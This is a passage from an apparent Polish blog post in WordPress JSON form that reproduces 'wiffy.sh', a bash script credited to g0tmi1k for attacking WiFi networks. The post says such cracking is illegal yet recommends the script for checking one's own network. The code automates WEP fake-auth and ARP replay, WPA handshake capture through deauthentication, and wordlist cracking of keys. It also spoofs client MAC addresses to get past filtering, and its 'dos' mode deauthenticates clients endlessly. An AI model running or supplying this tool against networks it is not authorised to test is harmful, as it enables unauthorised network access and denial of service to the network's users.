# Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0013.jpg\"\n){kind=link}